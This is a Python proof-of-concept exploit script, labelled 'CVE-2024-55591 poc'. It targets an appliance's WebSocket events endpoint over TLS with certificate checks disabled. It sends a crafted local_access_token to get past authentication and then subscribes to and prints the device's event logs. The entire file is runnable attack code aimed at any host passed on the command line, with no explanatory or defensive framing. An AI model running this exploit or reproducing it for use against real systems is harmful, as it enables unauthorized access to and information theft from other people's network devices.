#!/usr/bin/python3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from uuid import uuid4
from datetime import datetime, timedelta
from pwn import *
import requests
import random
import argparse
import ssl
import socket
import threading
import http.client
import re
import urllib.parse
import time
import hashlib
import math
import random
import string
import struct
import subprocess
import json

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

HOST = "192.168.182.188"
PORT = 443  
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


CIPHERS = "ECDHE-RSA-AES256-SHA@SECLEVEL=0"
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
context.set_ciphers(CIPHERS)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

def create_ssl_socket():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))
    ssl_sock = context.wrap_socket(sock)
    return ssl_sock

def try_read_response(sock) -> bytes:
    def read_or_raise(n):
        read = sock.read(n)
        if not read:
            raise RuntimeError(f"Unable to read response headers: {headers}")
        return read

    count = 0
    max_count = 10
    while not (headers := sock.read(1)):
        count += 1
        time.sleep(0.1)
        if count == max_count:
            raise RuntimeError(f"Unable to read response headers: {headers}")

    while b"\r\n\r\n" not in headers:
        headers += read_or_raise(100)

    return headers

def upgrade_http_to_websocket_req(sock, path: str,websocket_key) -> bytes:
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {HOST}:{PORT}\r\n"
        f"Connection: keep-alive, Upgrade\r\n"
        f"Sec-WebSocket-Version: 13\r\n"
        f"Sec-WebSocket-Key: {websocket_key}\r\n"
        f"Upgrade: websocket\r\n"
        f"\r\n"
    )
    sock.sendall(request.encode())
    return try_read_response(sock)

def generate_websocket_key():
    return base64.b64encode(bytes(''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') for i in range(16)]), 'utf-8')).decode('utf-8')

def create_websocket():
    sk = create_ssl_socket()
    websocket_key = generate_websocket_key()
    response_header = upgrade_http_to_websocket_req(sk,"/ws/events/?local_access_token=a5a5a5a5a5a5adasda8sd8sd8ewerfgfg",websocket_key)

    if "HTTP/1.1 101 Switching Protocols" not in response_header.decode("utf-8"):
        raise Exception("WebSocket handshake failed!")

    accept_key = None
    for line in response_header.decode("utf-8").split('\r\n'):
        if line.startswith('Sec-WebSocket-Accept'):
            accept_key = line.split(':')[1].strip()
            break

    expected_accept_key = base64.b64encode(hashlib.sha1((websocket_key + GUID).encode('utf-8')).digest()).decode('utf-8')

    if accept_key != expected_accept_key:
        raise Exception("WebSocket handshake validation failed!")

    print("WebSocket handshake successful!")
    return sk

def parse_websocket_frame(frame):
    first_byte = frame[0]
    second_byte = frame[1]
    
    # FIN, RSV1, RSV2, RSV3, Opcode
    fin = (first_byte >> 7) & 0x01
    rsv1 = (first_byte >> 6) & 0x01
    rsv2 = (first_byte >> 5) & 0x01
    rsv3 = (first_byte >> 4) & 0x01
    opcode = first_byte & 0x0F
    
    # Mask and Payload length
    mask = (second_byte >> 7) & 0x01
    payload_length = second_byte & 0x7F

    offset = 2
    if payload_length == 126:
        payload_length = struct.unpack('>H', frame[offset:offset + 2])[0]
        offset += 2
    elif payload_length == 127:
        payload_length = struct.unpack('>Q', frame[offset:offset + 8])[0]
        offset += 8

    masking_key = frame[offset:offset + 4] if mask else None
    if mask:
        offset += 4

    payload_data = frame[offset:offset + payload_length]

    if mask:
        payload_data = bytes([payload_data[i] ^ masking_key[i % 4] for i in range(len(payload_data))])

    return {
        'fin': fin,
        'rsv': (rsv1, rsv2, rsv3),
        'opcode': opcode,
        'mask': mask,
        'payload_length': payload_length,
        'payload_data': payload_data
    }

def receive_websocket_frame(sock):
    frame_header = sock.read(2)
    if len(frame_header) < 2:
        return Exception("Not valid websocket data!") 

    frame = frame_header
    payload_length = frame[1] & 0x7F 
    if payload_length == 126:
        frame += sock.read(2)
        payload_length = struct.unpack(">H", frame[2:4])[0]
    elif payload_length == 127:
        frame += sock.read(8)
        payload_length = struct.unpack(">Q", frame[2:10])[0]
    
    frame += sock.read(payload_length)
    
    return parse_websocket_frame(frame)

def generate_masking_key():
    return bytes([random.randint(0, 255) for _ in range(4)])

def send_websocket_frame(sock, payload_data, opcode=0x1):
    payload_length = len(payload_data)
    
    first_byte = 0b10000000 | (opcode & 0x0F) 
    second_byte = 0b10000000  # 默认 Mask = 1
    
    if payload_length <= 125:
        header = bytearray([first_byte, second_byte | (payload_length & 0x7F)])
        header.extend(generate_masking_key()) 
        masked_payload = bytes([payload_data[i] ^ header[2 + (i % 4)] for i in range(payload_length)]) 
        frame = header + masked_payload
    elif payload_length >= 126 and payload_length <= 65535:
        header = bytearray([first_byte, second_byte | 0x7E])
        header.extend(struct.pack('>H', payload_length))
        header.extend(generate_masking_key())
        masked_payload = bytes([payload_data[i] ^ header[4 + (i % 4)] for i in range(payload_length)])
        frame = header + masked_payload
    elif payload_length > 65535:
        header = bytearray([first_byte, second_byte | 0x7F])
        header.extend(struct.pack('>Q', payload_length))
        header.extend(generate_masking_key()) 
        masked_payload = bytes([payload_data[i] ^ header[10 + (i % 4)] for i in range(payload_length)]) 
        frame = header + masked_payload

    sock.send(frame)

def main():
    global HOST
    global PORT

    parser = argparse.ArgumentParser(description='CVE-2024-55591 poc')
    parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
    parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
    args = parser.parse_args()
    HOST = args.target
    PORT = args.port

    sk = create_websocket()
    data = receive_websocket_frame(sk)
    print(data)

    send_websocket_frame(sk,json.dumps({"type":"eventLogSubscribe","payload":"*"}).encode())
    while True:
        data = receive_websocket_frame(sk)
        print(data)

if __name__ == "__main__":
    main()